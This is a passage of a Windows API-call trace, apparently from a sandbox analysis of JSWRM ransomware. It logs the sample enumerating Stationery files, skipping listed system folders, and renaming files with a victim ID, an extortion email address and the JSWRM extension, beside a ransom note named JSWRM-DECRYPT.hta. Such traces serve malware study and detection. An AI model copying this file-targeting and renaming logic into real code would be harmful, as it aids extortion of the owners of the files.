MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0068.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0068.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.842] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.842] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="HandPrints.jpg", cAlternateFileName="")) returned 1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".") returned 1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="..") returned 1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="...") returned 1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="windows") returned -1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="recovery") returned -1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="perflogs") returned -1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="documents and settings") returned 1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="system volume information") returned -1 [0068.842] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="msocache") returned -1 [0068.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HandPrints.jpg", lpUsedDefaultChar=0x0) returned 14 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HandPrints.jpg", lpUsedDefaultChar=0x0) returned 14 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.848] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10088190985883800) returned 0 [0068.848] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.848] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.848] CloseHandle (hObject=0xffffffff) returned 1 [0068.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0068.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0068.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0068.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0068.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0068.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.849] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1faebf90, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1faebf90, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1faebf90, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.849] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.849] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Orange Circles.htm", cAlternateFileName="")) returned 1 [0068.849] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".") returned 1 [0068.849] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="..") returned 1 [0068.849] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="...") returned 1 [0068.849] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="windows") returned -1 [0068.849] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="recovery") returned -1 [0068.849] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="perflogs") returned -1 [0068.850] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="documents and settings") returned 1 [0068.850] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.850] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="system volume information") returned -1 [0068.850] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="msocache") returned 1 [0068.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x240fc0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange Circles.htm", lpUsedDefaultChar=0x0) returned 18 [0068.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Circles.htm", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange Circles.htm", lpUsedDefaultChar=0x0) returned 18 [0068.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.853] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10082418549839992) returned 0 [0068.853] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.853] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.853] CloseHandle (hObject=0xffffffff) returned 1 [0068.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0068.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0068.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.854] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.854] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="OrangeCircles.jpg", cAlternateFileName="")) returned 1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".") returned 1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="..") returned 1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="...") returned 1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="windows") returned -1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="recovery") returned -1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="perflogs") returned -1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="documents and settings") returned 1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="system volume information") returned -1 [0068.854] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="msocache") returned 1 [0068.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OrangeCircles.jpg", lpUsedDefaultChar=0x0) returned 17 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OrangeCircles.jpg", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OrangeCircles.jpg", lpUsedDefaultChar=0x0) returned 17 [0068.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.855] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10088912540392048) returned 0 [0068.855] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.855] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, 